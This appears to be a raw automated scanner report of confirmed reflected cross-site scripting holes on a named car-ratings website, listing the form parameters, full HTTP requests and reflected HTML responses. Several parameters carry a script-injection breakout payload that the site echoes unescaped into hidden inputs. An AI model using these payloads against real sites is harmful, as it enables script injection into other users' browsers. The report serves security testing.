<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x0008D2)</script>" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000909)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000909)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:42:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000909)</script>" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /view_ratings.php

/view_ratings.php CONFIRMED

http://www.strategicvision.com/view_ratings.php

Parameters

Parameter Type Value
referrer POST '"--></style></script><script>alert(0x00090A)</script>
v_yr1 POST 3
v_mk1 POST 3
v_mo1 POST 3
v_yr2 POST 3
v_mk2 POST 3
v_mo2 POST 3
v_yr3 POST 3
v_mk3 POST 3
v_mo3 POST 3
v_yr4 POST 3
v_mk4 POST 3
v_mo4 POST 3
v_yr5 POST 3
v_mk5 POST 3
v_mo5 POST 3

Request

POST /view_ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 214
Expect: 100-continue
Accept-Encoding: gzip, deflate

referrer='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00090A)%3c%2fscript%3e&v_yr1=3&v_mk1=3&v_mo1=3&v_yr2=3&v_mk2=3&v_mo2=3&v_yr3=3&v_mk3=3&v_mo3=3&v_yr4=3&v_mk4=3&v_mo4=3&v_yr5=3&v_mk5=3&v_mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:42:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Automotive Ratings Comparison</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"> <div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p> </td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;<span class="style4">Automotive Ratings Comparison</span></div> <div class="pagetext"> <div class="pagetitle_small">Comparison Charts</div> <table width="97%" border="0" cellpadding="5" cellspacing="0" class="text" style="border-bottom: solid #CCCCCC 3px;"> <tr> <td width="75" style="border-bottom: solid tan 3px;">&nbsp;</td> </tr> <tr bgcolor="#F0F0E2"> <td class="boldtext" style="border-right: solid tan 1px;">Segment</td> </tr> <tr height="60"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_tqa.php" class="boldtext">Total Quality Index</a> <br /><span class="noteQuote">(higher number is better)</span> <ul class="smallListText"> <li>Satisfaction with complete ownership experience</li> <li>Perception of quality</li> <li>Emotional attachment to vehicle</li> </ul> </td> </tr> <tr height="60" bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_tvi.php" class="boldtext">Total Value Index</a> <br /><span class="noteQuote">(higher number is better)</span> <ul class="smallListText"> <li>Delight with the deal</li> <li>Belief in getting a smart buy</li> <li>Likelihood to repurchase, based on value</li> </ul> </td> </tr> <tr height="60"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_pim.php" class="boldtext">Problem Impact Measure</a> <br /><span class="noteQuote">(lower number is better)</span> <ul class="smallListText"> <li>Reports of problems</li> <li>Nature of the problems reported</li> <li>Nature of unresolved problems</li> </ul> </td> </tr> <tr height="60" bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_delight.php" class="boldtext">Customer Delight Index</a> <br /><span class="noteQuote">(higher number is better)</span> <ul class="smallListText"> <li>Customer loyalty and commitment to product</li> <li>Creates a significant emotional response in<br />personally meaningful ways</li> </ul> </td> </tr> </table> <br /> <!-- Show the relative comparison of each vehicle --> <table width="97%" border="0" cellpadding="5" cellspacing="0" class="text" style="border-bottom: solid #CCCCCC 3px; border-right: solid #CCCCCC 1px;"> <tr bgcolor="#F0F0E2"> <td colspan="3" class="boldtext" style="border-top: solid tan 3px;">Side-by-side Comparison</td> </tr> <tr> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_tqe.php" class="boldtext">Total Quality Index</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> <tr bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_tvi.php" class="boldtext">Total Value Index</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> <tr> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_pim.php" class="boldtext">Problem Impact Measure</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> <tr bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_delight.php" class="boldtext">Customer Delight Index</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> </table> <p class="boldtext" align="right"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST '"--></style></script><script>alert(0x0009D1)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0009D1)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:44:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
